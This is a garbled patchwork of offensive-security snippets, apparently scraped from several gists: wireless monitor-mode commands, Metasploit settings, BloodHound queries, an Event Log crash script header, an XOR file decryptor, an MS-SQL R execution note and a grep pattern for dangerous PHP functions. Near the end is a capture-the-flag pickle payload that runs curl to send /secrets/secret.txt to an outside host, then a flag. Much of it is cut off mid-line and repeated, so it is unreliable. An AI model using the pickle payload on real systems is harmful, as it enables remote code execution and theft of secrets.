# Wireless Penetration Testing Cheat Sheet
## WIRELESS ANTENNA
- Enable monitor mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
| set LogLevel 5 | |
| set ConsoleLogging true | |
| set SessionLogging true | |
| set TimestampOutput true | |
| features set dns_feature true | |
| features set postgres_session_type true | |
| features set mssql_session_type true | |
| features set mysql_session_type true | |
| features set wrapped_tables true | |
| features set fully_interactive_shells true |
| <!-- https://github.com/ealtili/Blog/blob/master/WindowsSandbox.md --> | |
| <!-- https://github.com/microsoft/Windows-Sandbox-Utilities --> | |
| <!-- https://github.com/damienvanrobaeys/Run-in-Sandbox --> | |
| <!-- http://www.systanddeploy.com/2019/06/run-file-in-windows-sandbox-from-right.html --> | |
| <!-- http://www.systanddeploy.com/2019/07/windows-sandbox-editor-update.html --> | |
| <Configuration> | |
| <VGpu>Default</VGpu> | |
| <Networking>Default</Networking> | |
| <MappedFolders> | |
| <MappedFolder> |
| { | |
| "queries": [{ | |
| "name": "--https://github.com/ZephrFish/Bloodhound-CustomQueries/--", | |
| "queryList": [{ | |
| "final": true, | |
| "query": "" | |
| }] | |
| }, | |
| { | |
| "name": "Return All Azure Users that are part of the 'Global Administrator' Role", |
| # Crash the Windows Event Log Service remotely, needs Admin privs | |
| # originally discovered by limbenjamin and accidentally re-discovered by @byt3bl33d3r | |
| # | |
| # Once the service crashes 3 times it will not restart for 24 hours | |
| # | |
| # https://github.com/limbenjamin/LogServiceCrash | |
| # https://limbenjamin.com/articles/crash-windows-event-logging-service.html | |
| # | |
| # Needs the impacket library (https://github.com/SecureAuthCorp/impacket) |
| #!/bin/bash | |
| while :; do | |
| verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1) | |
| pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1) | |
| ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))") | |
| #!/usr/bin/env python | |
def xor(data, key):
    """XOR every byte of ``data`` with ``key``, cycling the key as needed.

    Args:
        data: byte sequence to transform (e.g. a ``bytearray``).
        key: non-empty byte sequence used as the repeating XOR key.

    Returns:
        A new ``bytearray`` of the same length as ``data``.

    Raises:
        ZeroDivisionError: if ``key`` is empty and ``data`` is not.
    """
    key_len = len(key)
    return bytearray(byte ^ key[pos % key_len] for pos, byte in enumerate(data))
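# Read the whole encrypted file into a mutable byte buffer. A context manager
# closes the handle deterministically; the original relied on the garbage
# collector to close the file object returned by open().
with open("my_magic_bytes.jpg.enc", "rb") as enc_file:
    data = bytearray(enc_file.read())
# Known plaintext from wikipedia https://en.wikipedia.org/wiki/List_of_file_signatures - XOR the enc file with it first
#key = bytearray([0xFF,0xD8,0xFF,0xE0,0x00,0x10,0x4A,0x46,0x49,0x46,0x00,0x01])
# 12 bytes key extracted from the file after the first above XOR
key = bytearray([0x46,0xcc,0xf9,0xa5,0x71,0xf0,0xff,0xb1,0x7e,0x41,0xcb,0x84])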
# Wireless Penetration Testing Cheat Sheet
## WIRELESS ANTENNA
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
| # original https://pastebin.com/zBDnzELT | |
Starting with MS-SQL 2016, Microsoft has allowed the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. For this functionality to be enabled, the R Services for SQL Server component must be installed, the server must be reconfigured to permit sp_execute_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly common.
Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script().
This can be 'fun'..
Sample R query in MS-SQL (from MSDN):
| #!/bin/bash | |
# Pattern defaults to "*" (match everything) unless a non-empty first
# argument was supplied; the ":-" form treats unset and empty alike, which
# matches the original [ -n "$1" ] test. (Presumably consumed by the grep
# invocation that follows — confirm against the full script.)
P="${1:-*}"
| grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s |
| cposix | |
| system | |
| p0 | |
| (S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444' | |
| p1 | |
| tp2 | |
| Rp3 | |
| . | |
| FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!} |